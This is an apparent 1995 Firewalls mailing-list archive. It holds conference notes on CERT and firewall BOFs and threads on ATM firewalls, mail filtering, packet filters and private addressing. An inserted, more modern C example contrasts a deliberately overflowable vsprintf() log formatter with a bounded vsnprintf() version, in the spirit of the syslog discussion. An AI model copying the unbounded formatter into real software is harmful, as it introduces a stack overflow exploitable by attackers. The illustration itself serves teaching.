From firewalls-owner Sun Oct 1 00:30:13 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id AAA09703 for firewalls-outgoing; Sun, 1 Oct 1995 00:24:36 -0700
Received: from huntergate.hunter.com (node2.hunter.com [199.217.148.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id AAA17493 for ; Fri, 29 Sep 1995 00:31:24 -0700
Received: (from daemon@localhost) by huntergate.hunter.com (8.6.11/8.6.9) id CAA19886; Fri, 29 Sep 1995 02:29:49 -0500
Received: from diablo.hunter.com(10.2.1.50) by huntergate.hunter.com via smap (V1.3) id sma019876; Fri Sep 29 02:29:45 1995
Received: from Microsoft Mail (PU Serial #0) by diablo.hunter.com (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Sep29.022645.0.1569; Fri, 29 Sep 1995 02:29:46 -0500
From: rik@spirit.com (rikspirit.com)
To: skh@huntergate.hunter.com, Firewalls@greatcircle.com (Firewalls)
Message-ID: <1995Sep29.022645.0.1569@diablo.hunter.com>
X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT
Mime-Version: 1.0
Content-Type: text/plain; charset="US-ASCII"
Organization: Hunter Engineering Company
Date: Fri, 29 Sep 1995 02:29:46 -0500
Subject: CERT and Firewalls BOFs
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Here are my notes from the Usenix LISA XI conference in Monterey, CA. I try to identify speakers, but still missed some, and there are parts missing (I tend to stop taking notes if things get so interesting I forget what I'm supposed to be doing.) Comments which I added later are in square brackets.

CERT BOF, 1830, 21 September, 1995

Ed DeHart of CERT started the CERT BOF by joking that the annual Sendmail-LISA CERT Alert had come out [a problem with SunOS sendmail when used with the -oR option]. Someone pointed out that last year it wasn't exactly sendmail, but rather Majordomo's use of sendmail that prompted the alert.
DeHart mentioned the latest release of sendmail, 8.7, which prompted yet another comment: a person claimed that Marcus Ranum had a two-line Perl script which would overflow a gets()-style buffer in the latest release. Ranum came in a few minutes later, but did not comment on this assertion in front of the group.

Syslog is considered by CERT to be the other current problem. [It is actually not the syslog daemon that's the problem, but the subroutine which gets called by applications to communicate with syslog.]

DeHart next stated that CERT is primarily interested in infrastructure problems, for example, people breaking into ISPs [Internet Service Providers]. He hinted that CERT's role would be changing from incident response to incident collection, infrastructure improvements, and working with vendors to fix problems. This prompted a question about vendors: why do they still deliver insecure versions of their operating systems? DeHart answered that customers must demand securely configured operating systems before vendors will be willing to deliver them. He mentioned a paper delivered the day before, by a security administrator from Sun, who said that SunSoft was not currently planning to improve the security of their delivered products because surveys of customers indicated that security was not an important consideration when buying OS products. [I'd asked the same question several years ago and got the same answer: when customers demand security, Sun will deliver it.]

DeHart pointed out that the vendors whose names appear most regularly in CERT advisories are cooperating with CERT. A prominent UNIX vendor which has no CERT advisories simply means the vendor is not cooperating with CERT.

The tool apparently used during the Tsutomu Shimomura break-in is being widely distributed. The tool takes advantage of 'r' commands (rlogin, rsh), even if protected by tcp_wrappers or netacl, by using IP source address spoofing.
The interface makes this cracking tool easy to use, asking for the name of the host to break into, and the name of the trusted host to masquerade as. DeHart repeated something he has said many times before: do the simple things, and the crackers will go elsewhere. "Why spend 10 minutes when they can take 30 seconds to get in?" [Perhaps this seems a little unfair, but only about 70% of large, commercial sites have any type of firewall (CSI report). And people are always adding new systems to the network without checking them first for security.] The Berkeley 'r' commands and NFS are not secure.

Question: What about Macs, NT, Windows 95? DeHart answered that we may start seeing things, but so far they are mostly clients. Client software is not susceptible to direct attacks.

Question: Will you report things like the Word virus? DeHart said not currently. Can't deal with every PC bug.

There are about 12,000 addresses on the CERT mailing list for advisories, and 50 parallel queues are used to deliver alerts (which takes one to two hours). The CERT tools mailing list has been inactive for months, and may not be re-opened.

====

Firewalls BOF, 1833, 21 Sept, 1995

Brent Chapman takes over, starting off with a brief history of the BOF (started at the Third Usenix Security Symposium in Baltimore three years ago). Currently 8,000 subscribers to firewalls, with perhaps 15,000 readers.

Carson Gaspar, of Lehman Brothers, next got things off to a lively start. [Gaspar is a frequent poster to the fwtk-users mailing list.] Carson asked the audience [about 110 persons] if he should rewrite the ftp-gw proxy, part of the Firewall Toolkit, to do passive ftp? Or should he work with Brimstone SOS [which also has a license similar to TIS's for their proxies, but fewer services], because the code quality is better. Security-wise, fwtk is good. But return codes are never checked: when a proxy fails, it fails silently. [For some reason, he doesn't know who wrote this "poor quality code".]
Marcus Ranum steps forward and says he wrote most of the code [his name appears in most proxies except http-gw]. There is no explosion, just tension and anticipation in the air.

Carson then does an informal survey. How many have commercial firewalls, how many have 'home-grown' firewalls, how many have no firewall? About as many have commercial products (~15) as have no firewall. More than three times as many have 'home-grown' firewalls. [In CSI's survey, 12% used TIS fwtk, and 16% stated other, which probably includes a lot of SOCKS users, because SOCKS wasn't listed as a category. So a Usenix LISA BOF was unsurprisingly different than the CSI survey, which included large, not predominantly UNIX, sites, and showed about 60-70% commercial firewall products.]

Brent Chapman commented on the licensing problem involved in publicly available software, such as Majordomo, or the Firewall Toolkit. Marcus Ranum stated that one major concern was divergent versions. There were no security problems with the toolkit per se, but there were known problems, many of which were dealt with in Gauntlet 3.0. [No one mentioned that the issue of how to proceed with extending the toolkit, or supporting it, was thoroughly hashed out during the Usenix Security Symposium at Salt Lake City. Chapman does comment:] "I for one do not want to go down that road again." Gaspar hasn't given up yet, and wants to distribute code. Ranum comes back again by saying the unreleased code base has diverged enormously, so it is hard to know if what you are fixing has already been fixed.

[Question: Has anyone used plug-gw to push notes through a firewall?] Alan Hannon, of Midnet, said he had done so, and plug-gw works fine for anything that is many-to-one.

I asked Chapman about the syslog problem. He responded that the problem is NOT in the syslog daemon, but in the function call library itself.
CSRG [Computer Science Research Group at Berkeley, which I thought had disbanded] threatened to go through all the [UNIX] code and remove all unbounded string copies [the problem], but gave up. [snprintf is the solution, pointed out a participant in the front row.]

Ranum steps onto the soapbox and states that "C is not a secure language, and UNIX is not a secure operating system. We're in the sendmail bug-of-the-month club because of this." Software engineers need to grow up. Hannon quips that this is like the hazardous waste industry: we're stuck with what we have. Ranum retorts that the user community is still buying toxic waste as fast as it can. Someone else asks, what about using Ada on NT? Ranum apparently ignores this, saying that for some applications, UNIX and C are not sufficient.

Another person I labeled said that he recommended a client buy Gauntlet. The client did, then insisted that they permit IRC through the firewall. TIS disagreed, the consultant disagreed, but IRC was rammed through anyway.

Hannon asked what people do about modems. Someone, a defense contractor, said they had to fire someone to make people take notice of the no-modem policy. Carson said Lehman implemented a dial-out modem pool, which is audited. Hannon said he worked hard so users would not WANT a modem. Carson stated that they dial all lines, using numbers acquired from facilities management, looking for modems. Two persons were 'let go'. Another got a slap on the wrist for a 'technical violation'.

Chapman said that policy is a management issue [his new book has a great chapter on policy, BTW]. Ranum responded by saying you need to get a letter from the biggest, hottest person saying why the policy is important, and then get approval from the highest ranking management (president, vice-president) possible.

Sal Collora asked what is the real threat posed by modems? Who is going to sit around dialing phone numbers looking for modems? Hannon answers that he hasn't met enough dweebs.
[I think, hasn't he heard of demon dialers, invented for the Apple II in the late '70s?] Ranum answered that he'd seen two firewall hosts broken into, both because modem-based attacks had been used to sniff passwords. He also said he has seen networks where the firewall host was the ONLY secure computer. Chapman also answered the question by saying that not publishing modem numbers was security through obscurity. Assume the problem is an insider or an ex-employee.

Collora said he'd only been at this job two months, and didn't want to beat his head against the wall. John [jco@direwolf.com] recommended doing a cost analysis. No sense building a fort protecting a dandelion. Chapman pointed out that just the cost of restoring the data would justify a firewall in most cases [one of my favorite points]. Secrecy, data integrity, and availability are reasons for security. Why do you keep the data if you don't need it?

John said he is worried about demon dialing. And that his site was fifth to be attached to the ARPANET, and they argued long and hard about putting in packet filters, not even a firewall [the company which owned that site now sells firewalls]. Ranum asked why they decided to add protection, to which John didn't respond.

Another survey. How many here have done some form of risk assessment? Around 20%. Have a site security policy? 20%. Have that policy signed and approved by a corporate officer? Only two hands go up. Chapman points out that every site has a security policy, even if it's not written.

Ranum then makes certain people are still awake. He mentions that in five years, lawyers will be able to sue for recovery of damages for a break-in. When there is a body of law available, they can slap suits without any effort. Likened this to soft body tissue damage. [Another of my favorite points. You have a network which is unprotected. Someone uses your network to break into another network, so the attack comes from your site. Who gets sued? Who has deep pockets?]
Another unidentified participant said that it is hard to keep people from screwing up machines. Chapman said you've got to do auditing.

Carson, responding to a question I didn't note, said security is an iterative problem. Pick the two biggest problems and fix them. Then go on, pick the next two top things, and fix those, and so on. He sleeps soundly at night because he has three layers of protection [in Lehman's firewall?]. Ranum asks "Does Lehman have Flowtrans?"

What scares Ranum is that the Internet is often behind the firewall. Private connections, connections to other organizations which are connected to the Internet. The Plan 9 guys, the Athena guys, have it right. Put security at the presentation device. John pointed out that Ranum was saying six or seven years until firewalls won't be needed, and now [several years later], he is saying three or four years. Ranum answered by saying that security has got to be everywhere.

Someone wants fascinating thing X. Rather than simply providing it, you need to make a service-oriented requirements analysis to see if they really need X, and how to get data to X. The real purpose of a firewall is to provide service. The six main services are Mail, Web, FTP, Telnet, News, and DNS. Another speaker said you can't control clients, to which Ranum responded "The only way to solve bad management is to become it."

John pointed out that human engineering was the method used in the movie Hackers to get the modem pool number. NEARNet has had to deal with this. Their NOC [Network Operations Center] is one of the largest in the world. They went ahead and did a cost analysis which included the possibility that someone would set off a car bomb outside. They concluded it wasn't worth building a bunker in the middle of Cambridge.

Collora said he's interested in moving to NT. Chapman said that you should always pick the platform you are most familiar with. There are more tools on UNIX than anything else.
But if you don't have UNIX expertise, you're in a tough position. Collora said that he would be happy to buy something, then have a vendor to point a finger at. John asked if he'd ever read a software license agreement, where the only warranty is on the media used for distribution of the software.

And, amazingly enough, the meeting broke up in time for the reception in the Monterey Aquarium at 2000.

Rik Farrow
rik@spirit.com

------ Message Header Follows ------
Reply-To: rik@spirit.com
Date: Tue, 26 Sep 1995 17:45:12 -0700
From: Rik Farrow
Message-Id: <199509270045.RAA01228@apache.spirit.com>
To: Firewalls@greatcircle.com
Subject: CERT and Firewalls BOFs
Sender: kenth@HNS.St-Louis.Mo.US
Precedence: bulk

From firewalls-owner Sun Oct 1 12:22:37 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA00145 for firewalls-outgoing; Sun, 1 Oct 1995 12:18:58 -0700
Received: from satsong.interserver.com (ckapilla.interserver.com [204.182.67.73]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA00138 for ; Sun, 1 Oct 1995 12:18:55 -0700
Message-Id: <199510011918.MAA00138@miles.greatcircle.com>
Received: from SATSONG by satsong.interserver.com id aa000379 at Sun, 1 Oct 95 12:16:01 Pacific Daylight Time--100
X-Sender: ckapilla@interserver.com
X-Mailer: Windows Eudora Version 2.1.1
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 01 Oct 1995 12:16:00 -0700
To: firewalls@GreatCircle.COM
From: Chris Kapilla
Subject: Mail Loops
X-Info: InterServe Web Systems, Inc.
X-Mailedby: NT SMTP/LISTSERVER v2.10 (ntmail@net-shopper.co.uk)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings all,

This isn't really relevant to firewalls, but it *is* relevant to this list because it seems to happen here regularly, i.e., those lovely mail storms. My questions are: what causes these, and what can I (and everyone else) do to make sure that *our* systems are never responsible for one of them? Thanks for any help.
Cooly,
Chris
-------------------------------------------------------------------
ckapilla@interserver.com   http://www.interserver.com   206.836.3661   206.836.9468

From firewalls-owner Sun Oct 1 15:30:01 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA02377 for firewalls-outgoing; Sun, 1 Oct 1995 15:21:48 -0700
Received: from hughes.network.com (hughes.network.com [129.191.63.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA02370 for ; Sun, 1 Oct 1995 15:21:43 -0700
Received: from [129.191.40.14] by hughes.network.com via SMTP (940816.SGI.8.6.9/940406.SGI) id RAA24859; Sun, 1 Oct 1995 17:19:15 -0500
Message-Id:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Date: Sun, 1 Oct 1995 18:23:45 -0500
To: firewalls@greatcircle.com, thierry@namsa.nato.int
From: hughes@hughes.network.com (James P. Hughes)
Subject: The ATM Firewall, research project. (was Re: Frame Relay firewalls???)
Cc: Ken Hardy , Ted Doty
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I believe that the initial quote is not talking about the switches
>themselves, but just to the IP traffic which comes via ATM; the
>company, which obviously has a product to sell and may be skewing
>reality a bit, seems to claim that ordinary IP firewalls need the whole
>IP packet, requiring reassembly.

Reality is in the eye of the beholder, but let me respond with a few comments. I am the principal investigator on this project and am responsible for the claims and backing those claims up with existence proofs. Ken is correct in what he is saying. We will have a product that we want to sell in the future when it is complete. At this time, it is not ready for -prime time-. At this time, it is a research project trying to understand how to completely firewall (using the most encompassing definition of the word) a 150Mb/s ATM stream.

>ATM packets are small and fixed sized -- 5 bytes header and 48 bytes
>payload.
>Don't recall details of what I read about IP over ATM (a
>recent Computer Communications Review had an issue devoted to ATM --
>v25n2 04/95), but I assume that the IP packets are spread among several
>ATM packets, rather than using IP fragmentation and having an entire IP
>packet, albeit a fragment, in each tiny ATM packet. (Corrections
>welcome.)

Your summary is indeed 100% correct. An IP packet is a sequence of cells. The first cell usually contains all of the IP header (IP options move things around) and the TCP and UDP headers can be in the 1st or later cell. The user data (obviously) is after that. The cells in the stream can be mixed with other cells of other virtual circuits.

>It appears that this outfit has some sort of IP firewall (maybe just a
>screen) for ATM that works without reassembling the IP packets,
>achieving lower latency.

At the lowest level, you are correct, but in the press release, there is not a lot of space to get in the detailed facts... This is a better forum for such a discussion. Packets where the policy can be digested to a low number of fields (VC number, SNAP, IP Frag, IP source and destination, IP Proto, Ports and flags) without need to be changed will indeed be screened. What is not mentioned is that packets that can not be secured through screening will be reassembled and fed into a more traditional firewall host (which is currently a Sun clone running SunOS, but the packets do not go through the SunOS networking stacks). Reassembly can be at the packet level or all the way to the TCP stream; there are only performance issues to work on. This is based on the idea that high performance connections (when authenticated) such as a FTP data transfer can, for the period of the transfer, be screened. (To my knowledge, this is similarly done by at least one combination of a Firewall and a brand C router...)
It is also expected that the high performance stuff will relieve the CPU load for the lower performance traffic (such as telnet, ftp control connection, etc). It is expected that a 1-3ms increase in latency for reassembled telnet sessions will not be a significant loss of performance to those sessions.

>It would be interesting to know what they have and what real extra
>value it offers.

Low latency and high performance streams. The latency of the screened traffic will be 15us +- 1us. There are several other ATM specific security measures such as filtering the ATM call setup messages and management cells.

>I posted the original press release. After having
>done so, I repented somewhat and thought that perhaps I should just
>have posted their URL for those really interested.

I am sorry to say that this is not in our web pages yet....

>But if it initiates
>a discussion here that helps increase general knowledge of these issues
>(like whether or not they're significant), without too much noise, it
>may be for the best.

I think that this discussion is for the better. Thanks. I welcome well thought out discussions of these kinds of technical issues. Please keep me in the reply stream, because I do not follow this mailing list. This is just a fragment of the details of the implementation; I will be happy to continue this discussion.
jim
--------------
HTTP://WWW.Network.com/~hughes

From firewalls-owner Sun Oct 1 16:52:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA03254 for firewalls-outgoing; Sun, 1 Oct 1995 16:28:56 -0700
Received: from rex.isdn.net (rex.isdn.net [198.79.88.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA03247 for ; Sun, 1 Oct 1995 16:28:53 -0700
Received: from ppp201.ts2.isdn.net by rex.isdn.net with smtp (Smail3.1.29.1 #10) id m0szXnH-00093FC; Sun, 1 Oct 95 18:27 CDT
Message-Id:
Date: Sun, 1 Oct 95 18:27 CDT
X-Sender: jbucy@rex.isdn.net (Unverified)
X-Mailer: Windows Eudora Version 1.4.3
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: firewalls@greatcircle.com
From: jbucy@rex.isdn.net (John Bucy)
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

From firewalls-owner Sun Oct 1 22:52:07 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id UAA06263 for firewalls-outgoing; Sun, 1 Oct 1995 20:31:01 -0700
Received: from uuneo.neosoft.com (uuneo.neosoft.com [206.109.1.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id UAA06256 for ; Sun, 1 Oct 1995 20:30:56 -0700
Received: from ris1.UUCP (ficc@localhost) by uuneo.neosoft.com (8.6.10/8.6.10) with UUCP id LAA08766 for GreatCircle.COM!Firewalls; Thu, 28 Sep 1995 11:22:41 -0500
Received: by ris1.nmti.com (smail2.5) id AA13594; 28 Sep 95 10:15:22 CDT (Thu)
Received: by sonic.nmti.com; id AA04617; Thu, 28 Sep 1995 10:42:17 -0500
From: peter@nmti.com (Peter da Silva)
Message-Id: <9509281542.AA04617@sonic.nmti.com.nmti.com>
Subject: Re: CERT and Firewalls BOFs
To: rik@spirit.com
Date: Thu, 28 Sep 1995 10:42:17 -0500 (CDT)
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <199509270045.RAA01228@apache.spirit.com> from "Rik Farrow" at Sep 26, 95 05:45:12 pm
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 1351
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

> Which prompted a question about vendors, why they still delivered
> insecure versions of their operating systems.
> [I'd asked
> the same question several years ago and got the same answer--when
> customers demand security, Sun will deliver it.]

Sounds like a case could be made for contributory negligence on Sun's part, given how long they've known of the problem...

> Carson asked the audience [about 110 persons] if he should rewrite the
> ftp-gw proxy, part of the Firewall Toolkit, to do passive ftp? Or
> should he work with Brimstone SOS [which also has a license similar to
> TIS for their proxies, but fewer services], because the code quality is
> better.

Why can't he just use whichever proxies he wants? They won't wake up and go "Ick, Freestone, I'm outta here!"...

> [Question: Has anyone used plug-gw to push notes through a firewall?]

I've used plug-gw to run WinDD through a firewall. Does that count?

> Someone else asks, what about using ADA on NT?

[insert reference to C.A.R. Hoare's Turing Award Lecture]

I've been playing around on NT. I don't have a compiler or debugger, but you have to assume just about any GPF in a service is a potential trouble spot. I've gotten GPFs in services. Remember, NT is written in assembly and C++.

Do any of your daemons core dump? Have you fixed or replaced them? Why not?
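Rik's notes above record the syslog(3) problem as an unbounded string copy, with snprintf offered from the front row as the fix, and Peter's reply asks why daemons that crash are left in service at all. The following is an added example, not code from the thread or from any of the products named in it, showing the shape of that bug class in C: a log-formatting routine that does vsprintf() into a fixed buffer next to one that uses vsnprintf() and checks its return value for truncation. The 64-byte buffer, the message format and the 200-byte "user name" are assumptions constructed for the demonstration.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Assumed fixed-size message buffer. The 1995 syslog(3) library bug had the
 * same shape: a caller-supplied string formatted into a stack buffer of
 * fixed size with no length bound. */
#define LOGBUF 64

/* Vulnerable shape: vsprintf() is never told how large buf is, so an argument
 * longer than the buffer is copied straight past its end (stack corruption).
 * Kept only for comparison; never call it with untrusted input. */
int format_log_unbounded(char *buf, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsprintf(buf, fmt, ap);          /* no bound: this is the bug */
    va_end(ap);
    return n;
}

/* Hardened shape: vsnprintf() is told the buffer size and always leaves a
 * NUL inside it. Its return value is the length the whole message would have
 * had, so n >= buflen means the message was cut short; report that rather
 * than silently shipping a truncated log line. Returns the number of bytes
 * written, or -1 on truncation or a formatting error. */
int format_log_bounded(char *buf, size_t buflen, const char *fmt, ...)
{
    va_list ap;
    int n;

    va_start(ap, fmt);
    n = vsnprintf(buf, buflen, fmt, ap);
    va_end(ap);
    if (n < 0 || (size_t)n >= buflen)
        return -1;
    return n;
}

/* How many bytes the unbounded version would have written for this input,
 * measured with snprintf(NULL, 0, ...) so nothing is actually overflowed. */
size_t bytes_unbounded_would_write(const char *fmt, const char *arg)
{
    int n = snprintf(NULL, 0, fmt, arg);
    return n < 0 ? 0 : (size_t)n + 1;   /* +1 for the terminating NUL */
}

/* Demonstration: a constructed 200-byte "user name" against the 64-byte
 * buffer. Returns 1 if the bounded formatter refuses it and still leaves a
 * properly terminated buffer behind, 0 otherwise. */
int demo_long_input_is_refused(void)
{
    char buf[LOGBUF];
    char user[201];
    int n;

    memset(user, 'A', sizeof user - 1);
    user[sizeof user - 1] = '\0';
    n = format_log_bounded(buf, sizeof buf, "login failed for %s", user);
    return n == -1 && strlen(buf) == LOGBUF - 1;
}

/* Demonstration: an ordinary input passes through unchanged. */
int demo_short_input_fits(void)
{
    char buf[LOGBUF];
    int n = format_log_bounded(buf, sizeof buf, "login failed for %s", "rik");
    return n == 20 && strcmp(buf, "login failed for rik") == 0;
}

int main(void)
{
    char buf[LOGBUF];
    char user[201];

    memset(user, 'A', sizeof user - 1);
    user[sizeof user - 1] = '\0';
    format_log_unbounded(buf, "login failed for %s", "rik");   /* fits: safe */
    printf("unbounded, short input: %s\n", buf);
    printf("bounded version refused the long input: %d\n", demo_long_input_is_refused());
    printf("bytes the unbounded version would have written: %zu (buffer is %d)\n",
           bytes_unbounded_would_write("login failed for %s", user), LOGBUF);
    return 0;
}
```

The point of the return-value check is the one Carson made about fwtk's proxies failing silently: a bounded copy that ignores truncation is safe from corruption but still loses the end of the line an auditor would have wanted.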
From firewalls-owner Mon Oct 2 02:00:02 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id BAA11950 for firewalls-outgoing; Mon, 2 Oct 1995 01:56:36 -0700
Received: from mimos.my (mimos.my [192.228.128.18]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id BAA11943 for ; Mon, 2 Oct 1995 01:56:30 -0700
Received: from ms.mimos.my (ms.mimos.my [192.228.129.33]) by mimos.my (8.6.12/8.6.12) with SMTP id QAA03026 for ; Mon, 2 Oct 1995 16:54:57 +0800
Received: by ms.mimos.my (5.64/7.0) id AA04020; Mon, 2 Oct 95 16:54:56 +0800
Date: Mon, 2 Oct 1995 16:54:55 +0800
From: Musaddik Mokhtar
To: firewalls@greatcircle.com
Subject: OPIE 2.03 with FWTK's auth
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello,

Has anybody used OPIE as a one-time password mechanism with FWTK's auth? I wonder if this could be done since it is very similar to S/KEY, which FWTK supports. If it has been done by anybody out there, I could use and would appreciate some pointers (no point taking time reinventing the wheel).

For those who are looking for S/KEY to fix on BSDI boxes (but to no avail), I suggest you take a look at OPIE. It works like a charm on BSDI.

Regards.
- Musaddik
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/
_/ Musaddik Mokhtar                 dique@ms.mimos.my                      _/
_/ System Support Group             http://www.bsk.mimos.my/~dique         _/
_/ Division of Computer Systems @ MIMOS, Malaysia                          _/
_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/_/

From firewalls-owner Mon Oct 2 02:52:33 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id CAA13075 for firewalls-outgoing; Mon, 2 Oct 1995 02:43:11 -0700
Received: from hk.super.net (hk.super.net [202.14.67.4]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id CAA13054 for ; Mon, 2 Oct 1995 02:42:49 -0700
Received: from rssd.hk.olivetti.com (rssd.hk.olivetti.com [202.64.192.5]) by hk.super.net (8.7/8.7) with SMTP id RAA18734 for <@hk.super.net:firewalls@greatcircle.com>; Mon, 2 Oct 1995 17:40:50 +0800 (HKT)
Message-Id: <199510020940.RAA18734@hk.super.net>
Subject: Re: Choice of secure router software
To: lyndond@sentinet.demon.co.uk (Lyndon David)
Date: Mon, 2 Oct 1995 17:30:22 +0800 (HKT)
From: "Raju M. Daryanani"
Cc: firewalls@greatcircle.com
In-Reply-To: <199509271534.QAA07205@server.sentinet.demon.co.uk> from "Lyndon David" at Sep 27, 95 04:32:55 pm
X-Mailer: ELM [version 2.4 PL21]
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

According to Lyndon David:
> At the moment I am looking at the routers and have set up a
> machine running screend which works just fine, my question
> though is this. The filter rules in screend only work on
> forwarded packets, it is unable to operate on any packets
> destined for any of the machines interfaces. Obviously this

I am setting up a single machine to act as both a router and a firewall.
I'm using FreeBSD and originally planned on using screend to do all the packet filtering, until I ran into this "forwarded packets only" limitation. I've now switched to ip_fil, which can be found on coombs.anu.edu.au. It also allows greater control in specifying IP flags and options than screend or the ipfilter that ships with FreeBSD.

One big difference between screend and ip_fil is that screend does a bit of caching to decide whether an IP fragment should be forwarded or not. ip_fil doesn't, but it does allow you to block fragments that might overwrite the headers in the original packet. That prevents the attack whereby someone sends in a packet with a valid header then overwrites the header options with a following fragment.

I think ipfirewall only works on SGI machines, so I didn't look into it.

> Would anyone be interested in a free router software resource
> section in the FAQ, with enough replies we (I) could prepare
> a section if it was thought to be of enough interest and the
> maintainer is willing.

I proposed this to someone else who sent me a few suggestions on using FreeBSD as a firewall. At the time I was suggesting a FreeBSD specific writeup, complete with installation tips, but I think a more generic writeup would be just as useful.

Raju
--
Raju M. Daryanani         | Email: raju@rssd.hk.olivetti.com
Technical Support Manager |        raju@hk.super.net, raju@air.org
Products Division         | Tel: +852 2979 2450 / Fax: +852 2802 6650
Olivetti (HK) Ltd.
                          | [Finger for PGP key] [MIME understood]

From firewalls-owner Mon Oct 2 03:22:37 1995
Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA13862 for firewalls-outgoing; Mon, 2 Oct 1995 03:11:57 -0700
Received: from caesar.udac.se (caesar.udac.se [193.44.79.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id DAA13855 for ; Mon, 2 Oct 1995 03:11:53 -0700
Received: by caesar.udac.se id AA22982 (5.67b-Emil1.1/IDA-1.5 for Firewalls@GreatCircle.COM); Mon, 2 Oct 1995 11:08:22 +0100
Date: Mon, 2 Oct 1995 11:08:21 +0100 (MEZ)
From: Mats Bredell
Subject: Re: Mail Proxy
To: Chris Tyler
Cc: Firewalls@GreatCircle.COM
In-Reply-To: <306bfa630.8f9@devel.dejong.com>
Message-Id:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Fri, 29 Sep 1995, Chris Tyler wrote:

> Thinking about this, the main possibilities are:
>
> uuencode
> binhex
> MIME
>
> and a whack of proprietary formats. Each of these has a recognizable header or
> some other string signature, regardless of where (body or attachment) the data
> appears. Couldn't a nice fat regexp be written that would detect these strings? And,
> although there are a whack of proprietary formats, if you targeted the ones that
> your site would likely be able to decode (don't worry about, say,
> WANG-2200-MAILABLE-BINARY or IBM-EBCDIC-AUTOMACRO-ENCRYPTED if
> you're only running on PCs and Suns :-), you should be able to stop 99%+ of the
> binaries-within-mail, no? (And most macros, etc., will be binary, although not object
> code).

Have a look at Emil, a package that converts different mail formats. Emil can be used as a filter, discovers the attachment formats and converts them into the format you want. This won't solve your particular problem, but a filter that converts all incoming mail into uuencode should make it a lot simpler.
Emil can be found at

/Mats

From firewalls-owner Mon Oct 2 04:22:56 1995
Date: Mon, 2 Oct 1995 14:08:02 +0200 (EET)
From: Slava Kritov
To: Chris Tyler
Cc: Firewalls@GreatCircle.COM
Subject: Re: Mail Proxy
In-Reply-To: <306c46060.cfb@devel.dejong.com>

Hi!

> > based on name ...
>
> Right... so? The purpose was to deny all attachments, whether Word DOCs
> or executables. So you look for the uuencode signature string and deny.

Users *will* complain ...

Maybe something like PDF (Acrobat) will solve the problem?

Best,
Slava

From firewalls-owner Mon Oct 2 04:30:27 1995
Date: Mon, 2 Oct 1995 14:22:53 +0200 (EET)
From: Slava Kritov
To: Christopher Osborn
Cc: firewalls@greatcircle.com
Subject: Re: Running ftpd on another port

Hi!

> have the logdaemon ftpd run on another port. It can run on any port (high
> ports are fine!). I can't find a compile switch or parameter on the
> daemon (clients of course are no problem.)

Look in inetd.conf. Duplicate the record with ftpd, and put another port number.

Best,
Slava

From firewalls-owner Mon Oct 2 05:53:11 1995
Message-Id: <199510021231.FAA17889@miles.greatcircle.com>
Date: Mon, 02 Oct 1995 08:33:01 EDT
From: toon@cem-bb.e-mail.com
To: firewalls@greatcircle.com
Subject: RFC 1597

I really like the idea of what is proposed in RFC1597; this is (I think) AT PRESENT (before the general implementation of IPv6, who knows when) THE SOLUTION for small companies with a potential need for a lot of IP addresses (printers, LAN print boxes, ...).

To connect such a network to the Internet, I understand that one needs the proper kind of firewall (dual-homed gateway, nice name). To make this work perfectly one would like to have the possibility to reserve a small part of the official addresses (class C?) to be 'translated' in a static way to the internal addresses of the servers to be reached from the outside world. The remaining part should make a 'pool' to be dedicated dynamically (only when needed) for those IP hosts that need connection from the inside to the Internet.

I am a relatively new subscriber to this mailing list and I was glad to find RFC1597 is somewhat a 'hot topic'.

MY QUESTION: Does someone already work in this way?
I hope to get in contact with people that do have some working experience with the connection between their 10. network and the Internet. Although we intend to buy a commercial firewall, I'm also interested in the experiences of people with self-made firewalls.

I don't know for sure that what follows is really allowed in this forum. If not, Brent Chapman should let me know and I won't do it again. I just do it because I find it an important matter and I want to know the opinion of other people dealing with Internet security. This is also completely my own opinion and not the one of my employer.

